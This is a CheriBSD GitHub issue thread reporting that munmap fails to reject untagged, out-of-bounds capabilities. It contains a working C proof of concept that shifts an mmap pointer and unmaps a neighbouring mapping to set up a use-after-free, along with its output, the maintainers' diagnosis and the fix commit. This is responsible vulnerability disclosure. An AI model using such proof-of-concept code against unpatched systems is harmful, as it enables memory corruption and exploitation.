CTSRD-CHERI/cheribsd #709: munmap doesn't check the pointer is in bounds

saaramarmsft, 2020-09-29:
The signature of munmap is as follows:
    int munmap(void *addr, size_t length);

munmap doesn't validate the bounds of the raw pointer passed as addr is in bounds. So, if we'll be able to inc/dec a valid capability returned by mmap (without dereferencing it) and passed it to munmap, you'll be able to unmap existing virtual mapping, and trigger UAF.

**POC:**

#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>

#define LENGTH 0x2000

void spray_mappings(char **mappings, size_t count) {
	for(size_t i = 0; i < count; ++i) {
		printf("call mmap(, 0x%x, ...) == ", LENGTH);

		mappings[i] = (char*)mmap(NULL, LENGTH, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0);
		printf("%p\n", mappings[i]);
	}

}

int main(void) {
	size_t cnt = 8;
	char *mappings[0x20] = { 0 };
	char *first = NULL;
	size_t length = 0x0;

	memset(mappings, 0x0, sizeof(mappings));

	spray_mappings(mappings, cnt);

	printf("-----------------------------------\n");

	
	printf("length for the munmap call == 0x");
	fflush(stdin);
	scanf("%zx", &length); 
	printf("length == 0x%zx\n", length);

	printf("---- test: first is a correct fat pointer (ptr+cap), dec it and move it OOB forwards\n");
	first = mappings[0];
	printf("first == %p\n", first);
	first += 0x8000;
	printf("first == %p\n", first);

	printf("call munmap( %p, 0x%x ) with the fat ptr from mmap() shifted forwards\n", first, length);
	munmap(first, length);
	printf("after munmap()\n");

	spray_mappings(mappings + cnt, cnt);

	return 0;
}

**OUTPUT:**

root@qemu-cheri128-Testadmin:~/vm_poc # ./vm_poc_forwards
call mmap(, 0x2000, ...) == 0x40abc000
call mmap(, 0x2000, ...) == 0x40abe000
call mmap(, 0x2000, ...) == 0x40ac0000
call mmap(, 0x2000, ...) == 0x40ac2000
call mmap(, 0x2000, ...) == **0x40ac4000**
call mmap(, 0x2000, ...) == 0x40ac6000
call mmap(, 0x2000, ...) == 0x40ac8000
call mmap(, 0x2000, ...) == 0x40aca000
-----------------------------------
length for the munmap call == 0x2000
length == 0x2000
---- test: first is a correct fat pointer (ptr+cap), dec it and move it OOB forwards
first == 0x40abc000
first == **0x40ac4000**
call munmap( 0x40ac4000, 0x2000 ) with the fat ptr from mmap() shifted forwards
after munmap()
call mmap(, 0x2000, ...) == **0x40ac4000**
call mmap(, 0x2000, ...) == 0x40acc000
call mmap(, 0x2000, ...) == 0x40ace000
call mmap(, 0x2000, ...) == 0x40ad0000
call mmap(, 0x2000, ...) == 0x40ad2000
call mmap(, 0x2000, ...) == 0x40ad4000
call mmap(, 0x2000, ...) == 0x40ad6000
call mmap(, 0x2000, ...) == 0x40ad8000
root@qemu-cheri128-Testadmin:~/vm_poc #

jrtc27, 2020-09-29:
Could you please verify which commit hash of CheriBSD you are using?

saaramarmsft, 2020-09-29:
Of course! I tested it on the following commits:
70d364d1cc8e77790d786751c2f5531cd29d8575
51703f25e023bdf6f4ba458289585818ee848b8d

brooksdavis, 2020-09-29:
I see what's happening.  The bug is that someone (almost certainly me) assumed that `__CAP_CHECK` checked the tag, but it only checks that there is succinct space in the capability.  It turns out that the `first += 0x8000` is succulently out of bounds to clear the tag.  I found this by changing all the `%p`s to `%#p` in the PoC so we get this snippet of output which tells me that we've cleared the tag.  If you change the 0x8000 to 0x1000 (or use a larger initial request) you'll see that the munmap fails.
```
---- test: first is a correct fat pointer (ptr+cap), dec it and move it OOB forwards
first == v:1 s:0 p:0007817d b:00000000402f2000 l:0000000000002000 o:0 t:-1
first == v:0 s:0 p:0007817d b:00000000402fa000 l:0000000000002000 o:0 t:-1
call munmap( v:0 s:0 p:0007817d b:00000000402fa000 l:0000000000002000 o:0 t:-1, 0x2000 ) with the fat ptr from mmap() shifted forwards
```
@jrtc27 also found this and is working on a fix.

P.S. The `%#p` output differs in the latest tree, the VM I'm testing on is a little out of date.

saaramarmsft, 2020-09-29:
Thanks @brooksdavis and @jrtc27! Really impressive response time :) This is a really interesting issue :)

commit 19deb057 (2020-10-01): Fix munmap/mprotect/minherit allowing untagged capabilities

Closes: #709
closed 2020-10-30 by arichardson